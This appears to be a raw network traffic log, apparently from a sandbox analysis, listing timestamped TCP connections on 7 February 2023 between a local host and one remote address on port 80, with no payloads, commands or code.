Feb 7, 2023 19:57:17.691453934 CET	80	49748	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.691529989 CET	49748	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.803448915 CET	49748	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.804164886 CET	49749	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.864340067 CET	80	49748	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.864608049 CET	49748	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.866816998 CET	80	49749	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.866936922 CET	49749	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.867892981 CET	49749	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.930708885 CET	80	49749	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.933248043 CET	80	49749	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.933326006 CET	49749	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.043118000 CET	49749	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.044387102 CET	49750	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.105849028 CET	80	49749	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.105911970 CET	80	49750	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.106044054 CET	49749	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.106069088 CET	49750	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.108793974 CET	49750	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.170213938 CET	80	49750	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.173399925 CET	80	49750	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.173506021 CET	49750	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.346127033 CET	49750	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.347399950 CET	49753	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.407798052 CET	80	49750	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.408160925 CET	49750	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.408797979 CET	80	49753	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.408942938 CET	49753	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.413042068 CET	49753	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.474488020 CET	80	49753	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.477334023 CET	80	49753	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.479259968 CET	49753	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.611223936 CET	49753	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.612123966 CET	49754	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.674813986 CET	80	49753	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.675250053 CET	80	49754	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.675411940 CET	49753	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.675458908 CET	49754	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.680476904 CET	49754	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.742854118 CET	80	49754	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.745625973 CET	80	49754	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.745801926 CET	49754	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.900932074 CET	49754	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.901772022 CET	49755	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.962852955 CET	80	49755	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.962882996 CET	80	49754	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:18.963068962 CET	49754	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.963514090 CET	49755	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:18.963514090 CET	49755	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.024725914 CET	80	49755	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.028769970 CET	80	49755	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.029001951 CET	49755	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.133794069 CET	49755	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.134459972 CET	49757	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.194607019 CET	80	49757	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.194773912 CET	49757	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.195363998 CET	80	49755	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.195442915 CET	49755	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.196420908 CET	49757	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.256814957 CET	80	49757	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.260746002 CET	80	49757	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.260894060 CET	49757	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.419100046 CET	49757	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.419959068 CET	49758	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.480483055 CET	80	49757	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.480662107 CET	49757	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.482445955 CET	80	49758	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.482574940 CET	49758	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.484124899 CET	49758	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.546896935 CET	80	49758	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.550895929 CET	80	49758	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.551022053 CET	49758	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.665586948 CET	49758	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.666465998 CET	49760	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.727384090 CET	80	49760	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.727569103 CET	49760	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.727895975 CET	80	49758	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.727993965 CET	49758	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.749026060 CET	49760	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:19.809391975 CET	80	49760	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.812340021 CET	80	49760	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:19.812438011 CET	49760	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.004988909 CET	49760	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.005949974 CET	49762	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.065337896 CET	80	49760	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.065546036 CET	49760	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.068026066 CET	80	49762	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.068207979 CET	49762	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.088453054 CET	49762	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.150475025 CET	80	49762	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.153971910 CET	80	49762	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.154155970 CET	49762	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.301280975 CET	49762	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.302077055 CET	49763	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.362984896 CET	80	49763	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.363034010 CET	80	49762	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.363240957 CET	49762	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.363784075 CET	49763	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.363784075 CET	49763	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.424287081 CET	80	49763	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.427040100 CET	80	49763	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.427134037 CET	49763	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.538676023 CET	49763	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.539532900 CET	49764	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.599817991 CET	80	49763	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.599986076 CET	49763	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.602344036 CET	80	49764	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.602447987 CET	49764	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.603429079 CET	49764	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.666115046 CET	80	49764	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.669308901 CET	80	49764	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.669464111 CET	49764	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.788029909 CET	49764	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.788657904 CET	49765	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.850284100 CET	80	49765	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.850718975 CET	80	49764	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.850776911 CET	49765	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.850843906 CET	49764	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.854176998 CET	49765	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:20.916277885 CET	80	49765	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.918634892 CET	80	49765	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:20.918750048 CET	49765	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.029146910 CET	49765	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.029959917 CET	49766	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.091572046 CET	80	49765	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.091718912 CET	49765	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.094614029 CET	80	49766	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.094763041 CET	49766	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.096100092 CET	49766	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.158727884 CET	80	49766	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.163320065 CET	80	49766	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.163459063 CET	49766	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.276724100 CET	49766	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.277582884 CET	49768	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.339479923 CET	80	49766	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.339555025 CET	49766	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.339932919 CET	80	49768	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.340024948 CET	49768	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.340553999 CET	49768	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.403269053 CET	80	49768	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.406193018 CET	80	49768	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.406267881 CET	49768	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.522910118 CET	49768	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.523824930 CET	49769	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.584180117 CET	80	49769	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.584342003 CET	49769	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.585123062 CET	49769	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.586086035 CET	80	49768	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.586242914 CET	49768	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.645431995 CET	80	49769	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.650852919 CET	80	49769	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.650963068 CET	49769	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.758301973 CET	49769	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.761847973 CET	49770	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.818082094 CET	80	49769	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.818336964 CET	49769	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.823348045 CET	80	49770	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.823544025 CET	49770	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.824481964 CET	49770	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:21.885919094 CET	80	49770	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.890430927 CET	80	49770	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:21.890614986 CET	49770	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.007277966 CET	49770	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.008183002 CET	49771	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.068830013 CET	80	49771	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.068869114 CET	80	49770	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.069078922 CET	49770	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.069473028 CET	49771	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.069473028 CET	49771	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.130152941 CET	80	49771	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.134497881 CET	80	49771	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.134656906 CET	49771	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.242211103 CET	49771	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.243199110 CET	49772	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.302983046 CET	80	49771	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.303195953 CET	49771	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.305391073 CET	80	49772	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.305512905 CET	49772	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.305855036 CET	49772	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.368016005 CET	80	49772	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.371057034 CET	80	49772	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.371198893 CET	49772	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.481935024 CET	49772	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.482769966 CET	49773	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.545026064 CET	80	49772	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.545090914 CET	80	49773	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.545234919 CET	49772	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.545272112 CET	49773	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.545756102 CET	49773	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.607738018 CET	80	49773	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.609993935 CET	80	49773	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.610146046 CET	49773	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.725584984 CET	49773	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.726291895 CET	49774	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.787601948 CET	80	49773	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.790841103 CET	80	49774	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.791001081 CET	49773	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.791028976 CET	49774	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.791511059 CET	49774	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.853142023 CET	80	49774	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.856558084 CET	80	49774	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:22.856720924 CET	49774	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.961281061 CET	49774	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:22.962250948 CET	49775	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.023406029 CET	80	49774	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.023556948 CET	49774	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.025121927 CET	80	49775	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.025311947 CET	49775	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.025798082 CET	49775	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.089682102 CET	80	49775	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.095626116 CET	80	49775	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.100511074 CET	49775	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.212006092 CET	49775	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.250499010 CET	49776	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.274859905 CET	80	49775	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.275033951 CET	49775	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.312226057 CET	80	49776	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.312454939 CET	49776	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.344979048 CET	49776	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.407176018 CET	80	49776	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.410629988 CET	80	49776	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.410788059 CET	49776	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.648570061 CET	49776	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.649509907 CET	49777	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.709161997 CET	80	49776	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.709328890 CET	49776	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.711416960 CET	80	49777	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.711637020 CET	49777	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.720957041 CET	49777	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.782897949 CET	80	49777	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.788146973 CET	80	49777	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:23.788326979 CET	49777	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.942743063 CET	49777	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:23.943859100 CET	49778	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.003473997 CET	80	49778	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.003700972 CET	49778	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.004333973 CET	80	49777	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.004435062 CET	49777	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.022380114 CET	49778	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.082273960 CET	80	49778	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.088174105 CET	80	49778	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.088282108 CET	49778	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.244874954 CET	49778	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.245557070 CET	49779	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.306042910 CET	80	49778	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.306139946 CET	49778	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.308969975 CET	80	49779	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.309189081 CET	49779	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.309470892 CET	49779	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:24.371783018 CET	80	49779	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.376708984 CET	80	49779	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:24.376804113 CET	49779	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.172264099 CET	49779	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.173238039 CET	49780	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.234679937 CET	80	49779	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.234805107 CET	49779	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.235518932 CET	80	49780	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.235599995 CET	49780	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.243031979 CET	49780	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.305372000 CET	80	49780	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.311461926 CET	80	49780	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.311609983 CET	49780	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.453778028 CET	49780	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.454617977 CET	49782	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.516139984 CET	80	49782	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.516192913 CET	80	49780	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.516372919 CET	49780	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.516376972 CET	49782	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.569842100 CET	49782	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:25.631438017 CET	80	49782	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.635299921 CET	80	49782	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:25.635488987 CET	49782	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.204562902 CET	49782	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.205993891 CET	49783	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.266213894 CET	80	49782	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.266340017 CET	80	49783	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.266365051 CET	49782	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.266427040 CET	49783	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.313900948 CET	49783	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.405646086 CET	80	49783	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.405699015 CET	80	49783	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.425122023 CET	49783	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.801383972 CET	49783	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.802536011 CET	49784	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.862095118 CET	80	49783	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.862217903 CET	49783	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.864876986 CET	80	49784	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.865036964 CET	49784	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.871680021 CET	49784	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:27.934251070 CET	80	49784	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.936813116 CET	80	49784	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:27.936978102 CET	49784	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.054377079 CET	49784	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.055304050 CET	49785	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.116638899 CET	80	49785	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.116734028 CET	80	49784	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.116837978 CET	49785	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.116919041 CET	49784	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.117997885 CET	49785	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.179342985 CET	80	49785	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.183651924 CET	80	49785	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.183789968 CET	49785	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.289362907 CET	49785	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.290304899 CET	49786	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.351691961 CET	80	49785	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.351725101 CET	80	49786	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.351881981 CET	49785	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.351958036 CET	49786	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.358001947 CET	49786	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.418621063 CET	80	49786	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.421186924 CET	80	49786	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.421302080 CET	49786	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.544176102 CET	49786	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.545144081 CET	49787	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.604877949 CET	80	49786	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.605042934 CET	49786	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.605572939 CET	80	49787	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.605695009 CET	49787	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.606188059 CET	49787	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.666701078 CET	80	49787	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.670481920 CET	80	49787	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.670666933 CET	49787	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.773993969 CET	49787	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.775015116 CET	49788	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.834793091 CET	80	49787	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.835061073 CET	49787	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.835505962 CET	80	49788	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.835628986 CET	49788	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.836184978 CET	49788	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:28.896742105 CET	80	49788	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.899353027 CET	80	49788	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:28.899544954 CET	49788	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.013056993 CET	49788	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.013885021 CET	49789	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.073796988 CET	80	49788	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.074012041 CET	49788	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.074337959 CET	80	49789	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.074481010 CET	49789	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.074929953 CET	49789	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.135485888 CET	80	49789	62.204.41.4	192.168.2.5
